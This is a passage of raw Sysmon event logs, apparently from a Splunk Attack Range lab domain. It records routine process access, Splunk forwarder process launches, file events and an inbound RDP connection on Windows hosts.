09:18:54.701{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051961Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.701{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8C7E-6151-697A-00000000FC01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051960Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.701{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C7E-6151-697A-00000000FC01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051959Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.687{5EBD8912-8C7E-6151-697A-00000000FC01}7000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001051958Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:52.060{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63677-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x80000000000000001051957Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.186{5EBD8912-8C7E-6151-687A-00000000FC01}71445040C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051956Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.171{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E04DB00FBEDD3A237BAD859C816C9201,SHA256=6280C5C7AFD0B6B405E4D8DF14024DE6EBB413351463808AE705FB2BBCFA39D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051955Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.018{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C7E-6151-687A-00000000FC01}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051954Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.018{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051953Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.018{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051952Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.018{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051951Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.018{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.018{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8C7E-6151-687A-00000000FC01}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051949Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.018{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C7E-6151-687A-00000000FC01}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:54.003{5EBD8912-8C7E-6151-687A-00000000FC01}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980281Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:18:55.944{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4809B79915115959F4452BFF1DCF53EA,SHA256=D42EF4B5AF9969FC758585D04A2F42B3C2D6322BB99EEC0DE6A0A64916BCD93C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052001Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.901{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8C7F-6151-6B7A-00000000FC01}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.901{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8C7F-6151-6B7A-00000000FC01}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.901{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.901{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.901{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.901{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.901{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8C7F-6151-6B7A-00000000FC01}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001051994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.886{5EBD8912-8C7F-6151-6B7A-00000000FC01}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001051993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.717{5EBD8912-79C0-6151-E577-00000000FC01}42967048C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.717{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.717{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.717{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.717{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.701{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051987Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.701{5EBD8912-79C0-6151-E577-00000000FC01}42963900C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:18:55.654{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla 